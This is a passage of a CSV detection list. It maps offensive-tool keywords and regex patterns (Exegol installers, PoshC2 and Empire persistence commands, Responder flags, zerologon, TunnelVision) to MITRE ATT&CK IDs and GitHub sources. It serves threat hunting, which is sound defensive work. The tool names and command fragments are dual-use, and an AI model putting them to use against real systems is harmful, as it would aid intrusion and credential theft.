offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_kerbrute*",".{0,1000}install_kerbrute.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_krbrelayx*",".{0,1000}install_krbrelayx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_ldapdomaindump*",".{0,1000}install_ldapdomaindump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_ldaprelayscan*",".{0,1000}install_ldaprelayscan.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_ldapsearch-ad*",".{0,1000}install_ldapsearch\-ad.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_lnkup*",".{0,1000}install_lnkup.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_lsassy*",".{0,1000}install_lsassy.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_manspider*",".{0,1000}install_manspider.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*install_mitm6_pip*",".{0,1000}install_mitm6_pip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_noPac*",".{0,1000}install_noPac.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_ntlmv1-multi*",".{0,1000}install_ntlmv1\-multi.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_oaburl*",".{0,1000}install_oaburl.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_PassTheCert*",".{0,1000}install_PassTheCert.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive 
tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pcredz*",".{0,1000}install_pcredz.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_petitpotam*",".{0,1000}install_petitpotam.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pkinittools*",".{0,1000}install_pkinittools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_polenum*",".{0,1000}install_polenum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_privexchange*",".{0,1000}install_privexchange.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pth-tools*",".{0,1000}install_pth\-tools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pygpoabuse*",".{0,1000}install_pygpoabuse.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pykek*",".{0,1000}install_pykek.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*install_pylaps*",".{0,1000}install_pylaps.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pypykatz*",".{0,1000}install_pypykatz.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pywhisker*",".{0,1000}install_pywhisker.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pywsus*",".{0,1000}install_pywsus.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_responder*",".{0,1000}install_responder.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - 
T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_roastinthemiddle*",".{0,1000}install_roastinthemiddle.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_ruler*",".{0,1000}install_ruler.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_rusthound*",".{0,1000}install_rusthound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_shadowcoerce*",".{0,1000}install_shadowcoerce.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_smartbrute*",".{0,1000}install_smartbrute.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_smbmap*",".{0,1000}install_smbmap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_smtp-user-enum*",".{0,1000}install_smtp\-user\-enum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_sprayhound*",".{0,1000}install_sprayhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*install_targetedKerberoast*",".{0,1000}install_targetedKerberoast.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_webclientservicescanner*",".{0,1000}install_webclientservicescanner.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_windapsearch-go*",".{0,1000}install_windapsearch\-go.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_winrar_wine32.exe*",".{0,1000}install_winrar_wine32\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*install_winrar_wine64.*",".{0,1000}install_winrar_wine64\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 
- T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*install_zerologon*",".{0,1000}install_zerologon.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*installexe-persistence*",".{0,1000}installexe\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Installing DHCP server and net-tools*",".{0,1000}Installing\sDHCP\sserver\sand\snet\-tools.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*Install-Module -Name 
DSInternals*",".{0,1000}Install\-Module\s\-Name\sDSInternals.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Install-Module ps2exe*",".{0,1000}Install\-Module\sps2exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*install-persistence*",".{0,1000}install\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*install-persistence-cron*",".{0,1000}install\-persistence\-cron.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 
- T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Install-ServiceBinary*",".{0,1000}Install\-ServiceBinary.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Install-SSP -Path*.dll*",".{0,1000}Install\-SSP\s\-Path.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Install-SSP.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Install-SSP.ps1*",".{0,1000}Install\-SSP\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1116","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*install-tor2web.sh*",".{0,1000}install\-tor2web\.sh.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by means of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*int 
PotatoAPI::findNTLMBytes*",".{0,1000}int\sPotatoAPI\:\:findNTLMBytes.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*Intercepter-NG*",".{0,1000}Intercepter\-NG.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Intercepter-NG-1.0.zip*",".{0,1000}Intercepter\-NG\-1\.0\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Intercepter-NG-1.3.zip*",".{0,1000}Intercepter\-NG\-1\.3\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--interface * --wpad --lm --disable-ess*",".{0,1000}\-\-interface\s.{0,1000}\s\-\-wpad\s\-\-lm\s\-\-disable\-ess.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 